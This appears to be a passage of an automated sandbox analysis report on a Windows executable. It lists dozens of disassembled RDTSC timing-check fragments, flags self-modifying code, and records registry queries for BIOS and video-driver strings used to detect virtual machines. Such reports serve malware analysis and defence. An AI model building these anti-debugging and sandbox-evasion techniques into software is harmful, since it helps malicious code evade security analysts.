              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1823C second address: E1825B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A1050D6Eh 0x00000009 push eax 0x0000000a jmp 00007F99A1050D6Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E176F7 second address: E17709 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F99A0E9ACE8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17709 second address: E1770D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1770D second address: E17711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17B3F second address: E17B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A1050D79h 0x00000009 pop esi 0x0000000a jl 00007F99A1050D68h 0x00000010 jo 00007F99A1050D7Fh 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17CCD second address: E17CDD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99A0E9ACE8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17CDD second address: E17CFE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F99A1050D73h 0x0000000f push ebx 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop ebx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17E32 second address: E17E36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1F629 second address: E1F62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1F62E second address: E1F63F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A0E9ACECh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1F63F second address: E1F647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1FBD1 second address: E1FBD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1FBD5 second address: E1FBDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1FD10 second address: E1FD16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1FD16 second address: E1FD36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F99A1050D7Bh 0x0000000b jmp 00007F99A1050D6Fh 0x00000010 js 00007F99A1050D66h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1FD36 second address: E1FD4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99A0E9ACF1h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1FD4B second address: E1FD4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1FD4F second address: E1FD5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1FD5D second address: E1FD6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A1050D6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1FD6E second address: E1FD73 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1FE97 second address: E1FE9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1FFEF second address: E1FFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2016C second address: E20197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F99A1050D70h 0x0000000b jmp 00007F99A1050D6Eh 0x00000010 ja 00007F99A1050D66h 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E20197 second address: E2019C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E210A9 second address: E210B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E210B1 second address: E210CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007F99A0E9ACE6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 jl 00007F99A0E9ACE6h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E210CE second address: E210D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E210D2 second address: E210D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1F093 second address: E1F09E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F99A1050D66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E28606 second address: E2860C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E36BDC second address: E36BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E36BE1 second address: E36BEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F99A0E9ACE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E36D83 second address: E36D92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99A1050D6Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3E018 second address: E3E01E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E472E2 second address: E472E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E472E8 second address: E472F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E472F5 second address: E47301 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jo 00007F99A1050D66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E47301 second address: E4732E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99A0E9ACEEh 0x00000008 jng 00007F99A0E9ACE6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 jp 00007F99A0E9ACE6h 0x0000001b pop ecx 0x0000001c jl 00007F99A0E9AD03h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E54779 second address: E54785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F99A1050D66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5347A second address: E53480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E53480 second address: E53486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E53486 second address: E5348C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5348C second address: E53491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5388D second address: E53893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E53A17 second address: E53A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E53A1B second address: E53A59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F99A0E9ACEEh 0x00000011 jg 00007F99A0E9ACE6h 0x00000017 push eax 0x00000018 pop eax 0x00000019 pushad 0x0000001a jmp 00007F99A0E9ACEFh 0x0000001f jmp 00007F99A0E9ACEEh 0x00000024 jns 00007F99A0E9ACE6h 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56E6F second address: E56E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56E73 second address: E56E8C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F99A0E9ACE6h 0x00000008 jmp 00007F99A0E9ACEAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E58DF2 second address: E58DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E589D2 second address: E589D8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E589D8 second address: E589E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F99A1050D6Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E589E6 second address: E58A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F99A0E9ACF2h 0x0000000a popad 0x0000000b pushad 0x0000000c push ecx 0x0000000d jmp 00007F99A0E9ACF6h 0x00000012 pop ecx 0x00000013 jmp 00007F99A0E9ACEEh 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E58A2A second address: E58A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E58A2E second address: E58A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B100 second address: E5B106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B106 second address: E5B10A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B10A second address: E5B112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70C1A second address: D70C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F99A0E9ACE6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70C27 second address: D70C43 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99A1050D66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F99A1050D6Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70C43 second address: D70C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E74993 second address: E749B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F99A1050D77h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E749B3 second address: E749D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F99A0E9ACF7h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E77FCF second address: E77FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8C85A second address: E8C85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8C85E second address: E8C862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8CDE4 second address: E8CE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 jg 00007F99A0E9ACE8h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 jnc 00007F99A0E9ACE6h 0x00000016 jng 00007F99A0E9ACE6h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8CE05 second address: E8CE26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F99A1050D66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push ebx 0x0000000f jnl 00007F99A1050D66h 0x00000015 pop ebx 0x00000016 push edi 0x00000017 jl 00007F99A1050D66h 0x0000001d pop edi 0x0000001e push esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8D15B second address: E8D161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8D439 second address: E8D458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F99A1050D66h 0x0000000a jmp 00007F99A1050D73h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8D458 second address: E8D462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8D462 second address: E8D48A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F99A1050D66h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F99A1050D77h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8D48A second address: E8D48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8F03D second address: E8F041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8F041 second address: E8F047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8F047 second address: E8F051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8F051 second address: E8F055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8F055 second address: E8F05E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8F05E second address: E8F080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F99A0E9ACE6h 0x0000000a pop ecx 0x0000000b jnl 00007F99A0E9ACECh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007F99A0E9ACECh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8F080 second address: E8F084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8F084 second address: E8F08E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F99A0E9ACECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E91ECD second address: E91ED3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E931E7 second address: E93201 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F99A0E9ACEAh 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 jl 00007F99A0E9ACEEh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93201 second address: E9320D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jne 00007F99A1050D66h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E96A01 second address: E96A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A02DC second address: 52A031F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 pushfd 0x00000006 jmp 00007F99A1050D6Bh 0x0000000b add eax, 7D098C0Eh 0x00000011 jmp 00007F99A1050D79h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F99A1050D6Ch 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A031F second address: 52A0325 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A0325 second address: 52A0336 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ch, 0Fh 0x0000000e mov esi, edx 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A0336 second address: 52A037E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A0E9ACF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F99A0E9ACF0h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F99A0E9ACF7h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A03D0 second address: 52A03D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A03D8 second address: 52A0426 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99A0E9ACF8h 0x00000008 pushfd 0x00000009 jmp 00007F99A0E9ACF2h 0x0000000e jmp 00007F99A0E9ACF5h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A0426 second address: 52A0444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A1050D79h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A0444 second address: 52A0460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99A0E9ACF7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB46F8 second address: DB4701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DA9B64 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DCD643 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E2F7B4 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27153
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.8 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
